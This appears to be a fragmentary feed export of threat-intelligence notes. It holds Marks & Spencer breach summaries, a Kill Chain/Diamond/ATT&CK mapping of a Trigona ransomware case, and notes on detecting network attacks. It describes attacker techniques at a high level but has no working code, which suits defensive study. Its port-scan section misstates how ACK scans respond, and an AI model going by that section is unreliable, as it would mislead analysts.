plantilla-resumen-de-inteligencia-amenazas-al-sector-retail-y-ecomme
plantilla-target-file
plantilla-threat-intelligence
report-templates-bible
reporte-ejemplo-blockchain-1
reporte-ejemplo-blockchain-2
reporte-ejemplo-communication-patterns-1
reporte-ejemplo-communication-patterns-2
reporte-ejemplo-company-investigation
reporte-ejemplo-compliance-2
reporte-ejemplo-compliance-doc-1
reporte-ejemplo-cti-1
reporte-ejemplo-cti-2
reporte-ejemplo-domain-website
reporte-ejemplo-geoint-1
reporte-ejemplo-geoint-2
reporte-ejemplo-individual-investigation
reporte-ejemplo-network-recon ]]>themes/tema-report-writing-cti.htmlThemes/tema-report-writing-cti.mdTue, 28 Apr 2026 14:28:40 GMTentidad-ach
entidad-devils-advocacy
entidad-indicators-signposts
entidad-key-assumptions-check
entidad-mom-pop-moses-eve
entidad-multiple-hypothesis-generation
entidad-psychology-intelligence-analysis
entidad-quality-of-information-check ]]>themes/tema-sat-tecnicas-analisis-estructurado.htmlThemes/tema-sat-tecnicas-analisis-estructurado.mdTue, 28 Apr 2026 14:28:40 GMTblog-search
forums-discussion-boards
major-social-networks
real-time-social-search
reporte-ejemplo-communication-patterns-1
reporte-ejemplo-communication-patterns-2
social-media-tools
social-network-analysis
username-enumeration ]]>themes/tema-socmint-completo.htmlThemes/tema-socmint-completo.mdTue, 28 Apr 2026 14:28:40 GMTbrowsers-osint
dns-tools
domain-ip-research
metadata-extraction
network-scanning
offline-browsing
reporte-ejemplo-domain-website
reporte-ejemplo-network-recon
transport-osint
web-history-capture
web-scraping
wifi-wardriving ]]>themes/tema-techint-domain-network.htmlThemes/tema-techint-domain-network.mdTue, 28 Apr 2026 14:28:40 GMTentidad-bushidouk-rfi-template
entidad-curated-intelligence-threat-actor-profile
entidad-idir-templates
entidad-kraven-security-cti-template
entidad-mitre-cti-blueprints
entidad-zeltser-cti-template ]]>themes/tema-templates-comparativa.htmlThemes/tema-templates-comparativa.mdTue, 28 Apr 2026 14:28:40 GMTentidad-misp
entidad-opencti
entidad-stix-taxii
entidad-thehive ]]>themes/tema-tips-sirp-stack-open-source.htmlThemes/tema-tips-sirp-stack-open-source.mdTue, 28 Apr 2026 14:28:40 GMT3. The attack involved impersonating employees to trick IT help desk workers into resetting passwords 7(https://www.securitymagazine.com/articles/101609-marks-and-spencer-hackers-tricked-it-workers-into-resetting-passwords).
M&S Chairman Archie Norman revealed that the threat actors impersonated one of the 50,000 people working with the company to trick a third-party entity into resetting an employee's password 5. The attack was described as a "sophisticated impersonation attack" where attackers appeared as legitimate employees with their details, not simply requesting password changes 5.
Sources identified Tata Consultancy Services (TCS) as the third-party contractor involved in the breach. TCS provides help desk support for M&S and was reportedly tricked by the threat actors into resetting an employee's password, which was then used to breach the M&S network 5. At least two TCS employees' M&S logins were allegedly used as part of the breach 6.
The attack has been linked to the Scattered Spider cybercriminal group, which deployed DragonForce ransomware on M&S networks 5. Scattered Spider is known for its effective impersonations and social engineering tactics, having previously targeted Las Vegas casinos MGM Resorts and Caesars Entertainment using similar help desk manipulation techniques 1.
The attack caused significant disruption to M&S operations. The company was forced to suspend online orders and experienced empty food shelves after taking food-related systems offline 3. Bank of America analysts estimated that M&S lost more than £40 million in sales every week since the incident began 3, with total costs potentially reaching $400 million 6.
Customer data including names, dates of birth, phone numbers, home addresses, email addresses, and online order histories was stolen, though no payment card information was compromised 3. Approximately 150GB of data was believed to be stolen, with numerous VMware ESXi servers encrypted 5.
The M&S attack highlights the vulnerability of supply chain relationships and the effectiveness of social engineering tactics. Security experts noted that the attack demonstrates how a single vulnerability in the supply chain can cascade across entire networks 6. The incident serves as a reminder that organizations must implement robust verification procedures for help desk operations and maintain comprehensive incident response plans 4.
[1] (ReliaQuest Press Releases) How to prepare IT teams for social engineering attacks - https://www.itbrew.com/stories/2025/06/13/how-to-prepare-it-teams-for-social-engineering-attacks
[3] (Retail Systems) Marks & Spencer reveals hackers breached systems through third-party contractor - https://www.retail-systems.com/rs/Marks_Spencer_Reveals_Hackers_Breached_System_Through_Third_Party_Contractor.php
[4] (SecurityBrief Asia) Marks & Spencer cyber attack sparks customer data security fears - https://securitybrief.asia/story/marks-spencer-cyber-attack-sparks-customer-data-security-fears
[5] (BleepingComputer) M&S confirms social engineering led to massive ransomware attack - https://www.bleepingcomputer.com/news/security/mands-confirms-social-engineering-led-to-massive-ransomware-attack/
[6] (Cybernews) M&S confirms breach was result of third-party vendor social engineering attack - https://cybernews.com/news/marks-spencer-breach-tcs-third-party-vendor-social-engineering-attack/
[7] (Security Magazine) Marks & Spencer Hackers Tricked IT Workers Into Resetting Passwords - https://www.securitymagazine.com/articles/101609-marks-and-spencer-hackers-tricked-it-workers-into-resetting-passwords
Marks & Spencer (M&S) experienced a devastating cyberattack over Easter 2025 that severely disrupted its operations and is expected to cost the company around £300 million ($402 million) in lost profits 23. The attack, linked to the notorious Scattered Spider cybercriminal group and claimed by the DragonForce ransomware operation, forced M&S to suspend online shopping operations on April 25, 2025 13.
The cyberattack had widespread operational impacts, affecting card payments, gift cards, Click and Collect services, and causing food product shortages in stores 14. Online disruption was expected to continue through June and into July 2025, with the company working to gradually restart operations 2.
M&S confirmed that hackers stole personal customer information, including names, dates of birth, home addresses, and telephone numbers of millions of customers 27(https://cybernews.com/news/marks-spencer-customer-data-leak/). However, the company emphasized that no usable payment or card details or account passwords were compromised 28.
The retailer wrote to at least 18 million customers to inform them of the data breach and advised vigilance against potential fraudulent communications claiming to be from M&S 8.
M&S operates approximately 1,000-1,400 stores across Britain and makes around one-third of its clothing and home sales online, making the digital disruption particularly damaging 47(https://cybernews.com/news/marks-spencer-customer-data-leak/). The company's share price fell significantly following the attack, with approximately £700 million wiped off its stock market value 4.
Chairman Archie Norman described the attack as "traumatic" and noted that M&S was "fortunate" the incident occurred while the business was performing well, stating that if it had happened during the company's previous struggles, "we would have been kippered" 10.
Despite the cyber challenges, M&S continued with planned leadership changes, appointing John Lyttle as the new managing director of clothing, home and beauty in March 2025 6. Lyttle, formerly CEO of Boohoo Group, succeeded Richard Price who left in April 2025 to pursue a portfolio career 6.
The company also announced significant investment plans, including £90 million for its London store estate with 17 new and improved stores planned, focusing on new Foodhalls and store renovations 9.
Beyond cybersecurity issues, M&S faced additional operational challenges, particularly regarding Northern Ireland trade regulations. CEO Stuart Machin criticized new labeling requirements for products shipped from Great Britain to Northern Ireland as "bureaucratic madness," with over 1,000 M&S products requiring "not for EU" labels 5.
[1] (Hacking Archives - Security Affairs) British retailer giant Marks & Spencer (M&S) is managing a cyber incident - https://securityaffairs.com/176820/hacking/marks-spencer-ms-is-managing-a-cyber-incident.html
[2] (Malay Mail - Money) Marks and Spencer cyberattack to drag on until July, costing RM1.8b - https://www.malaymail.com/news/money/2025/05/21/marks-and-spencer-cyberattack-to-drag-on-until-july-costing-rm18b/177617
[3] (BleepingComputer) Marks & Spencer faces $402 million profit hit after cyberattack - https://www.bleepingcomputer.com/news/security/marks-and-spencer-faces-402-million-profit-hit-after-cyberattack/
[4] (News - FashionNetwork.com Worldwide) Britain's M&S enters second week of sales disruption after cyberattack - https://ww.fashionnetwork.com/news/Britain-s-m-s-enters-second-week-of-sales-disruption-after-cyberattack,1726149.html
[5] (Money | This is Money) Marks & Spencer hits out at grocery red tape madness - https://www.thisismoney.co.uk/money/markets/article-14854819/Marks-Spencer-hits-grocery-red-tape-madness.html
[6] (fashionunited.in) Marks & Spencer names new clothing, home and beauty boss - https://fashionunited.in/news/people/marks-spencer-names-new-clothing-home-and-beauty-boss/2025020648737
[7] (CyberNews Press Releases) Marks and Spencer cyber nightmare continues as customer information leaks - https://cybernews.com/news/marks-spencer-customer-data-leak/
[8] (Money | This is Money) Marks & Spencer to claim £100m in losses after Easter cyber attack hits sales - https://www.thisismoney.co.uk/money/markets/article-14712785/Marks-Spencer-claim-100m-losses-Easter-cyber-attack-hits-sales.html
[9] (fashionunited.uk) Marks & Spencer to invest 90 million pounds in London store estate - https://fashionunited.uk/news/retail/marks-spencer-to-invest-90-million-pounds-in-london-store-estate/2025042281193
[10] (Money | Mail Online) M&S 'could have been destroyed by cyber hack': High Street chain braces for £300m profits hit - https://www.thisismoney.co.uk/money/markets/article-14886651/M-S-destroyed-cyber-hack-High-Street-chain-braces-300m-profits-hit.html]]>projects/cti/caso-marks-spencer-scattered-spider.htmlProjects/cti/caso-marks-spencer-scattered-spider.mdTue, 28 Apr 2026 14:07:46 GMTbrowsers-osint para herramientas basadas en navegador ]]>projects/techint/android-osint-mobile.htmlProjects/techint/android-osint-mobile.mdTue, 28 Apr 2026 14:07:46 GMTprojects/cti/cti-offensive-security-github-tools.htmlProjects/cti/cti-offensive-security-github-tools.mdTue, 28 Apr 2026 12:46:02 GMTLampyre Implementación disponible para Excel, Python o dashboard Power BI/Tableau ]]>projects/cti/metodologia-scoring-riesgo-vip-cvss.htmlProjects/cti/metodologia-scoring-riesgo-vip-cvss.mdTue, 28 Apr 2026 12:46:02 GMTllm-pentesting para herramientas de pentesting de IA
Ver smart-contract-pentesting para auditoria de blockchain
Ver fuerza-bruta-autorizacion-iot para IoT ]]>projects/cti/red-team-vs-blue-team.htmlProjects/cti/red-team-vs-blue-team.mdTue, 28 Apr 2026 12:46:02 GMTpentest-inalambrico -- Herramientas complementarias de pentesting WiFi
Aircrack-ng Official Documentation Kali Linux Tools: aircrack-ng suite ]]>projects/techint/aircrack-ng.htmlProjects/techint/aircrack-ng.mdTue, 28 Apr 2026 12:46:02 GMTcategorias-componentes-vulnerabilidades-escaneo -- Herramientas de escaneo de vulnerabilidades especificas
deteccion-xss-multiples-tipos -- Herramientas relacionadas de XSS y SQLi ]]>projects/techint/analisis-codigo-dinamico-estatico.htmlProjects/techint/analisis-codigo-dinamico-estatico.mdTue, 28 Apr 2026 12:46:02 GMTanalisis-codigo-dinamico-estatico -- Herramientas complementarias de analisis de codigo fuente ]]>projects/techint/analisis-ejecutables-binarios.htmlProjects/techint/analisis-ejecutables-binarios.mdTue, 28 Apr 2026 12:46:02 GMTanalisis-codigo-dinamico-estatico -- Herramientas de analisis de codigo fuente
deteccion-xss-multiples-tipos -- Herramientas de XSS, subdominios y SQLi
evaluacion-vulnerabilidades-middleware -- Herramientas de middleware y fingerprinting ]]>projects/techint/categorias-componentes-vulnerabilidades-escaneo.htmlProjects/techint/categorias-componentes-vulnerabilidades-escaneo.mdTue, 28 Apr 2026 12:46:02 GMTcategorias-componentes-vulnerabilidades-escaneo -- Escaneadores de CMS y vulnerabilidades especificas
analisis-codigo-dinamico-estatico -- Herramientas de analisis de codigo fuente
evaluacion-vulnerabilidades-middleware -- Fingerprinting y enumeracion de subdominios ]]>projects/techint/deteccion-xss-multiples-tipos.htmlProjects/techint/deteccion-xss-multiples-tipos.mdTue, 28 Apr 2026 12:46:02 GMTcategorias-componentes-vulnerabilidades-escaneo -- Escaneadores de vulnerabilidades especificas
deteccion-xss-multiples-tipos -- Herramientas de XSS y enumeracion complementaria ]]>projects/techint/evaluacion-vulnerabilidades-middleware.htmlProjects/techint/evaluacion-vulnerabilidades-middleware.mdTue, 28 Apr 2026 12:46:02 GMTred-team-vs-blue-team para herramientas generales de pentesting
Ver domain-ip-research para herramientas de enumeracion web ]]>projects/techint/fuerza-bruta-autorizacion-iot.htmlProjects/techint/fuerza-bruta-autorizacion-iot.mdTue, 28 Apr 2026 12:46:02 GMTsmart-contract-pentesting para herramientas de seguridad blockchain
Ver red-team-vs-blue-team para herramientas generales de pentesting ]]>projects/techint/llm-pentesting.htmlProjects/techint/llm-pentesting.mdTue, 28 Apr 2026 12:46:02 GMTaircrack-ng para un kit completo de pentesting wireless
aircrack-ng -- Cheatsheet de aircrack-ng para cracking WiFi ]]>projects/techint/pentest-inalambrico.htmlProjects/techint/pentest-inalambrico.mdTue, 28 Apr 2026 12:46:02 GMTllm-pentesting para herramientas de pentesting de IA
Ver red-team-vs-blue-team para herramientas generales de pentesting ]]>projects/techint/smart-contract-pentesting.htmlProjects/techint/smart-contract-pentesting.mdTue, 28 Apr 2026 12:46:02 GMTosint-references-master. Concepto unico = nota propia.
Bellingcat
eInvestigator
IntelTechniques
NixIntel
OSINT Techniques
OSINT Ambition Publication
OSINT Team
OSINTCurious
Sector035
Skopenow
Sleuth For The Truth
Social Links Importado desde Inbox/Blogs.md durante consolidacion bulk. Directorio curado de blogs de los principales proveedores de Cyber Threat Intelligence (CTI). Fuentes esenciales para mantenerse actualizado sobre amenazas, campanas activas y analisis de malware.Fuentes de inteligencia / Blogs de proveedores CTI. Seguimiento diario de amenazas y campanas activas Fuente primaria para analisis de threat actors Alimentacion de procesos CTI y generacion de reportes
Complemento a alertas de threat-intelligence-feeds Unit42, CrowdStrike y Mandiant son las fuentes mas citadas en la industria Flashpoint y KE-LA destacan por su cobertura del underground
Ver social-media-tools para cuentas de seguimiento de estos proveedores ]]>projects/osint-references/osint-blogs.htmlProjects/osint-references/osint-blogs.mdTue, 28 Apr 2026 12:41:34 GMTdomain-ip-research y domain-ip-research RIPE Stat es especialmente util para investigaciones en la region EMEA BGP Toolkit de Hurricane Electric ofrece busqueda por ASN, prefijo o dominio
Parte del flujo de investigacion de infraestructura junto con domain-ip-research, dns-tools y threat-intelligence-feeds ]]>projects/techint/bgp-seekers.htmlProjects/techint/bgp-seekers.mdTue, 28 Apr 2026 12:41:34 GMTCurated Intel Community
CTI Fundamentals GitHub Visual Threat Intelligence by Thomas Roccia Intel471 CU-GIRH by Michael DeBolt The Intelligence Handbook by Christopher Ahlberg ]]>projects/cti/proactive-cti-collaboration.htmlProjects/cti/proactive-cti-collaboration.mdTue, 28 Apr 2026 12:37:38 GMTDark Reading - Threat Intelligence
7 Practical Considerations for Effective Threat Intelligence
ISC2 Cybersecurity Workforce Study (3.4M shortage) ]]>projects/cti/data-feeds-vs-intelligence.htmlProjects/cti/data-feeds-vs-intelligence.mdTue, 28 Apr 2026 12:37:38 GMTGitHub) - TI feed data gathering tool, stores data in tiq-test compatible format
tiq-test (GitHub) - Test suite for evaluating TI feeds, runs in R programming environment Focus on feeds containing IP addresses as indicators of compromise (IoC) Combine gathers approximately 18MB of GZipped CSV data per day Data gathering step takes about 10 minutes on a typical desktop computer Tests from tiq-test suite run against this dataset in R Execution time: ~20 seconds Measures which portion of a feed is contained in another feed Results in graphical matrix form with numerical values in R variables Key finding: All but one feed are quite unique in their IP address content
Similar overlap analysis available from MISP at misp.software/feeds Execution time: ~2 minutes Depicts ratio of IP addresses added and removed per day Key insight: High quality feeds update their content more frequently than lower quality feeds Caveat: Highly dependent on feed type; a feed may contain highly relevant data that doesn't update often One feed failed the test due to URL redirecting in data gathering stage Execution time: ~2 minutes Analyzes feeds in terms of indicator repetition throughout the time interval Aging = number of times an indicator is repeated on a feed One feed failed for the same URL redirect reason as novelty test Overlap, novelty and aging tests are feasible first steps towards repeatable analysis of TI feeds Interpretation of results may not be as straightforward as initially expected Feed uniqueness is generally high, suggesting minimal redundancy across free feeds Feed update frequency correlates loosely with quality but depends heavily on feed type and purpose 16 free TI feeds evaluated with quantitative methodology Most feeds show low overlap, indicating unique value per feed Novelty rate is a useful but imperfect quality proxy Aging analysis reveals indicator persistence patterns URL redirect issues can cause test failures in automated pipelines
Combine: https://github.com/mlsecproject/combine
tiq-test: https://github.com/mlsecproject/tiq-test
CinCan tiq-tests: https://gitlab.com/CinCan/wp1/tree/master/tiq-tests
MISP Feed Overlap: https://www.misp.software/feeds/ ]]>projects/cti/analyzing-ti-feeds-overlap-novelty.htmlProjects/cti/analyzing-ti-feeds-overlap-novelty.mdTue, 28 Apr 2026 12:37:36 GMT
Cyber Kill Chain FrameworkThe Cyber Kill Chain is a strategic framework developed by Lockheed Martin that outlines the stages of a cyber attack, providing a systematic approach for understanding and mitigating cyber threats. The framework consists of seven distinct phases: Reconnaissance: In this initial phase, adversaries gather information about the target, identifying potential vulnerabilities and gathering intelligence on the target’s systems and network architecture. Weaponization: In this phase, attackers develop or acquire malicious tools and create a payload to exploit the identified vulnerabilities. Delivery: Attackers deliver the weaponized payload to the target environment. This could be through methods such as email attachments, infected websites, or other means to deliver the malicious content to the victim’s system. Exploitation: Once the weaponized content reaches the target system, the attackers exploit vulnerabilities to gain unauthorized access. This phase involves executing the payload, taking advantage of weaknesses in the target’s security. Installation: After successful exploitation, the attacker installs malware or establishes a persistent presence on the compromised system. Command and Control (C2): Attackers establish communication channels between the compromised system and their infrastructure, enabling remote control. Actions on Objectives: In the final phase, attackers achieve their ultimate goals, which may include data exfiltration, system manipulation, or other malicious activities aligned with their objectives. This phase completes the cyber kill chain. The Cyber Kill Chain framework is instrumental in guiding organizations to understand and disrupt the different stages of a cyber attack, emphasizing the importance of breaking the chain at any phase to prevent successful intrusions.

Diamond Model FrameworkThe Diamond Model is a conceptual framework designed for the analysis and visualization of cyber threat intelligence and incidents. Its basic features include four key elements arranged in a diamond-shaped configuration: Adversary, Infrastructure, Victim, and Capability. Each vertex of the diamond represents one of these elements, and the relationships and interactions among them provide a structured way to understand cyber threats. The Adversary vertex focuses on the threat actor or group responsible for the incident. The Infrastructure vertex considers the systems used in the attack. The Victim vertex represents the entity or entities targeted. The Capability vertex addresses the specific techniques or methods employed by the adversary. The model’s also consists of meta-features, though not detailed here, add additional layers of analysis to enrich the understanding of cyber threats and aid in strategic decision-making. These meta-features are: Timestamp, Phase, Result, Direction, Methodology, Resources, Social-political, Technology.

MITRE ATT&CK FrameworkThe MITRE ATT&CK framework is a comprehensive knowledge base that outlines the TTPs employed by cyber adversaries during different stages of the cyber attack lifecycle. The framework is structured hierarchically, with tactics representing high-level objectives and techniques representing specific methods to achieve those objectives. Tactics are categorized into domains such as Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Impact, and more. Each tactic is then associated with a variety of Techniques, which are the specific means adversaries use to execute the tactics. For instance, in the Execution tactic, a technique might be “ Command and Scripting Interpreter” (T1059), representing the use of command-line interfaces by attackers for code execution. Procedures, the lowest level of the framework, provide real-world examples of adversaries implementing specific techniques. The ATT&CK framework serves as a valuable resource for understanding and improving defenses against a wide range of cyber threats.We all have seen incident reports containing information based on these insightful frameworks, but we haven’t seen them combining them. Let’s establish a theory for linking them, and discuss if this approach provides additional value with an application example.An example proposal for the combination is the following (this is just an example, someone can modify this with a different thinking):
CKC-DM-ATT&CK Linking ProposalThis example theory, maps the similar ATT&CK Tactics to their similar CKC phases (i.e. Command & Control is the same ). The rest of the ATT&CK Tactics are linked to the “Actions on Objectives” phase of the CKC, as someone can argue that these Tactics are utilized from the threat actors to achieve their objectives. On each CKC to ATT&CK combination, there is also the DM, from which there are utilized only the vertexes that apply. In example, in most scenarios, there are no enough artifacts to fill the Adversary vertex, thus it remains unfilled.
Now let’s apply our theory to a real incident reporting to explore this approach. We will utilize one (of the many) great report from The DFIR Report. More specifically, we will rely on the latest “Buzzing on Christmas Eve: Trigona Ransomware in 3 Hours” article.This report discusses an incident where the threat actors exploited a publicly exposed Remote Desktop Protocol (RDP) host, leading to data exfiltration and the deployment of Trigona ransomware. Take some time to read it if its new for you, so you can have an understanding before delving deep in this application example.Since we are now familiar with the technical findings, let’s try to apply our approach._Disclaimers_ Not every mapping would be correct, the important part here is to explore the different approach. There is nothing wrong with the initial reporting structure of the DFIR Report. Οn the contrary, it is excellent and includes simple and insightful information. We just try to apply our theory on a real world incident report. We will now start presenting the technical results of this incident using our described theory. We start with the Reconnaissance & Weaponization phases of the CKC. It is important to notice that due to lack of evidence and the difficulty in detecting such actions in these phases, the authors did not include specific information. However, based on the mentioned context, we tried to include those (for the purposes of applying the theory): For the Reconnaissance, we assumed that the threat actor manually searched the target through network tools i.e. Shodan or Censys, identified an exposed RDP service of a public facing IP of the organization they wanted to target, and gathered the Admin credentials for it i.e. from DarkWeb forums or leak sites.
Reconnaissance phase For the Weaponization, we assumed that the threat actors may be bought this access from an Initial Access Broker (IAB) and developed their own tools (i.e. many custom BAT files).
Weaponization phase For the Delivery, the threat actor used valid accounts to log in the external RDP service. This finding also included the source IPs and workstation names (which were also included in the Adversary and Infrastructure vertexes of the Diamond Model).
Delivery phase For the Exploitation, the threat actor utilized multiple BAT files that included CMD, PowerShell and Windows Management Instrumentation commands.
Exploitation phase4. For the Installation, the threat actor created accounts, added them in privileged groups, and the final Trigona ransomware payload added a registry value in the Run registry key.
Installation phase For the Command and Control, the threat actor utilized remote access software (RDP) and dropped multiple BAT scripts.
Command and Control phase Lastly, we end this application example with the Actions on Objectives phase, where a lot of combinations are depicted: For the Privilege Escalation, the threat actor utilized valid accounts with admin privileges.
Actions on Objectives phase — Privilege Escalation tactic For the Defense Evasion, the threat actor modified the registry (for hiding user accounts from the login) and disabling Windows Defender services using BAT files.
Actions on Objectives phase — Defense Evasion tactic For the Discovery, the threat actor utilized multiple tools and commands such as, ipinfo.bat, netscan.exe, sd.exe, whoami.exe, etc.
Actions on Objectives phase — Discovery tactic For the Lateral Movement, the threat actor utilized mostly RDP, along with SMB/Admin Shares (due to netscan’s psexec module), and laterally transferred each of their tools (BAT scripts, etc.).
Actions on Objectives phase — Lateral Movement tactic For the Exfiltration, the threat actor utilized rclone.exe (symmetric encryption for its configuration) to exfiltrate the stolen data to a Mega.io account (cloud storage). Unfortunately, the Mega.io account was not identified. It would be a nice addition to the Infrastructure (Exfiltration URL) and the Adversary (threat actor’s account) vertexes.
Actions on Objectives phase — Exfiltration tactic Lastly, for the Impact, the threat actor deployed Trigona ransomware, which encrypted the hosts’ data.
Actions on Objectives phase — Impact tacticSharing incident reporting findings is essential for the collective defense of the community, enabling proactive actions and preparation against evolving threats. The reporting methodology employed should yield valuable insights, spanning both technical details and high-level strategic considerations. In this article, we examined an innovative approach that combines the Cyber Kill Chain (CKC) phases, Diamond Model (DM) vertices, and MITRE ATT&CK tactics and techniques simultaneously. This holistic approach aims to capture both the technical intricacies and the modus operandi of threat actors. Your thoughts on this approach are highly welcomed. Feel free to share your feedback in the comment section on Medium or by commenting directly on my posts.
https://attack.mitre.org/
https://attack.mitre.org/docs/ATTACK_Design_and_Philosophy_March_2020.pdf
https://warnerchad.medium.com/diamond-model-for-cti-5aba5ba5585
https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf
https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf
https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/ ]]>projects/cti/combining-frameworks-incident-reporting.htmlProjects/cti/combining-frameworks-incident-reporting.mdTue, 28 Apr 2026 12:37:36 GMT<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*vmnaP83-Qbeyjsy9FbM3Vw.png"></figure>WA SOC Portal
SOC Onboarding: Onboarding Guide
Advisories (TLP:CLEAR): Security Advisories
ACSC Strategies to Mitigate: Further Five Guidelines
TTP Detection: Threat Hunting Guidelines
Data Sources
Security Operations
Vulnerability Management
Incident Reporting
Vendor Management
Network Management
Patch Management
Configuration Assessment
Annual Implementation Report
Security Analyst Induction
Azure Basics
Incident Reporting Portal (IRP)
Digital Government (DGOV)
WA Cyber Security Policy (WA CSP)
Under review; see Sentinel Triage AssistanT (STAT) as an approach to standardize and automate common triage actions
Based on CERT Societe Generale IRM-2022 (Incident Response Methodologies 2022), covering 18 common scenarios:
Worm Infection
Windows Intrusion
Unix/Linux Intrusion Detection
DDoS
Malicious Network Behaviour
Website Defacement
Windows Malware Detection
Blackmail
Smartphone Malware
Social Engineering
Information Leakage
Insider Abuse
Customer Phishing
Scam
Trademark Infringement
Phishing
Ransomware
Large Scale Compromise
Under review; references Patch Operating Systems and Patch Applications
Under review; Jupyter Notebooks effective for querying datalake repositories; see KQLmagic for Azure Data Explorer
Under review; see Collecting Evidence and Dissect for modern forensics tooling Aligned with CISA Cybersecurity Incident and Vulnerability Response Playbooks (508C) Aligned with MITRE 11 Strategies of a World-Class Cybersecurity Operations Center IRM-2022 covers 18 specific incident types with dedicated response methodologies Sections 1, 3, 4, 5 are under review with interim tool recommendations Free and publicly available resource suitable for SOC operationalization Use IRM-2022 as basis for incident response procedures when no internal playbook exists Adopt baselines for data sources, security operations and vulnerability management Use TTP detection guidelines for threat hunting program development Training materials suitable for SOC analyst onboarding
CISA Playbooks (508C)
MITRE 11 Strategies
IRM-2022 GitHub ]]>projects/cti/cyber-security-playbooks.htmlProjects/cti/cyber-security-playbooks.mdTue, 28 Apr 2026 12:37:36 GMT#Detection-and-Mitigation of #Common-Attacks
#Ping-Flood: Overwhelms a target with excessive ping requests, overloading resources and preventing legitimate traffic.
#SYN-Flood: Exploits the three-way handshake by sending incomplete connection requests (SYN packets) without completing the handshake, leaving the server waiting for nonexistent responses.
#UDP-Flood: Bombards a target with User Datagram Protocol (UDP) packets, which are connectionless and don't require handshakes, further increasing resource consumption.
#Application-Layer-DoS: Targets specific vulnerabilities in web applications (e.g., slow database queries) to disrupt performance or crash them. Security Solution: DDoS Protection Services, Web Application Firewalls (WAFs), Intrusion Prevention Systems (IPS), and Traffic Analysis Tools Detection in SIEM: Anomalies in network traffic, such as a sudden increase in connection attempts or high bandwidth usage. SIEM Solution Features: Threshold monitoring, anomaly detection, and real-time alerting based on abnormal patterns. Implement rate limiting to control the number of requests from a single source. Use load balancing to distribute traffic across multiple servers. Employ Content Delivery Networks (CDNs) to absorb and filter traffic. Ping Flood: An attacker floods a target server with a massive number of ICMP echo requests using a tool like "hping" or "ping-of-death," overwhelming its resources and causing it to become unresponsive.SYN Flood: Attackers send a flood of TCP SYN packets, overwhelming the target's ability to complete the threeway handshake, and exhausting its connection resources.HTTP GET Flood: An attacker uses automated tools to flood a web server with a large number of HTTP GET requests, consuming server resources and causing it to slow down or crash.DNS Amplification: An attacker spoofs the source IP address and sends a small DNS query to an open DNS server, which, in turn, responds with a larger response to the forged source IP, amplifying the traffic directed at the target.
#Botnets: Networks of compromised devices remotely controlled by attackers to launch coordinated DoS attacks, creating a larger flood of traffic compared to single-source DoS.
#Amplification-Attacks: Leverage vulnerable servers like DNS resolvers to amplify response packets to the target, exponentially increasing their impact.
#Reflective-Attacks: Craft packets in a way that makes them appear to originate from the target itself, redirecting the attack's impact back to the victim server. Security Solution: DDoS Protection Services, Content Delivery Networks (CDNs), and Traffic Scrubbing Services. Detection in SIEM: Unusual spikes in traffic from multiple sources, patterns consistent with known DDoS attack signatures. SIEM Solution Features: Anomaly detection, correlation of traffic patterns, integration with DDoS protection services. Utilize DDoS protection services provided by cloud service providers. Deploy appliances or services that specialize in detecting and mitigating DDoS attacks. Configure firewalls to block known malicious IP addresses. Mirai Botnet: Compromised IoT devices, such as cameras and routers, are used collectively as a botnet to flood a target with traffic, disrupting its services.
#ARP-Spoofing: Deceives devices on a network by providing false ARP (Address Resolution Protocol) responses, diverting traffic to the attacker's machine, allowing them to eavesdrop and potentially modify it.
#DNS-Spoofing: Intercepts or redirects DNS requests, leading users to malicious websites instead of the legitimate ones they intended to visit.
#SSL-tripping: Downgrades encrypted HTTPS connections to unencrypted HTTP, exposing sensitive data transmitted between the user and the website. Security Solution: SSL/TLS Encryption, Certificate Pinning, Network Monitoring Tools, Intrusion Detection/Prevention Systems (IDS/IPS). Detection in SIEM: Unexpected changes in network traffic or ARP/DNS discrepancies. SIEM Solution Features: Network traffic analysis, log analysis, and anomaly detection for unexpected changes in communication patterns. Use encryption (SSL/TLS) to secure communication channels. Implement secure Wi-Fi protocols (WPA3) for wireless networks. Regularly monitor and update network configurations to detect unauthorized changes. ARP Spoofing: An attacker sends falsified Address Resolution Protocol (ARP) messages to associate their MAC address with the IP address of a target, intercepting and manipulating the traffic.DNS Spoofing: Manipulating DNS responses to redirect users from a legitimate website to a malicious one by providing false IP address information.SSL Stripping: Downgrading a secure HTTPS connection to an unencrypted HTTP connection, allowing the attacker to intercept sensitive data.
#Passive-Sniffing: Captures network traffic without actively interacting with it, observing data exchanged between devices on the same network segment.
#Active-Sniffing: Employs techniques like ARP spoofing or packet injection to manipulate network traffic and capture data more deliberately. Security Solution: Encryption (SSL/TLS, VPNs), Network Segmentation, Intrusion Detection/Prevention Systems (IDS/IPS). Detection in SIEM: Monitoring for unauthorized sniffing activities, and analyzing network traffic for abnormal patterns. SIEM Solution Features: Log analysis, real-time monitoring, and detection of unusual network behavior. Encrypt sensitive data using protocols like SSL/TLS or VPNs. Implement network segmentation to limit access to sensitive information. Use intrusion detection/prevention systems to detect and block sniffing attempts. Wireshark: An attacker uses Wireshark to capture and analyze packets on a network, gaining unauthorized access to sensitive information, such as login credentials.
#Port-scanning is a process used to identify open ports on a computer or network device. These ports represent potential entry points for communication and attackers use port scans to discover weaknesses and vulnerabilities. Each type of scan reveals different information:
#SYN-Scan: Method: Sends a single SYN (Synchronize) packet to each port, mimicking the start of a three-way handshake (SYN, SYN-ACK, ACK). Response: Open port: Replies with a SYN-ACK packet, expecting an ACK in return (attacker doesn't respond to avoid full connection). Closed port: Replies with an RST (Reset) packet, indicating the port is not listening. Filtered port: No response, making it harder to determine if the port is open or closed. Advantages: Faster than full scans, good for initial reconnaissance. Disadvantages: Doesn't differentiate between open and filtered ports.
#ACK-Scan: Method: Sends an ACK (Acknowledge) packet to each port, pretending to acknowledge a non-existent connection. Response: Open port: No response, as the port wasn't expecting an ACK. Closed/filtered port: Replies with an RST (Reset) packet. Advantages: Can sometimes identify open ports even if filtered by firewalls. Disadvantages: Slower than SYN scans, might trigger security alerts on some systems.
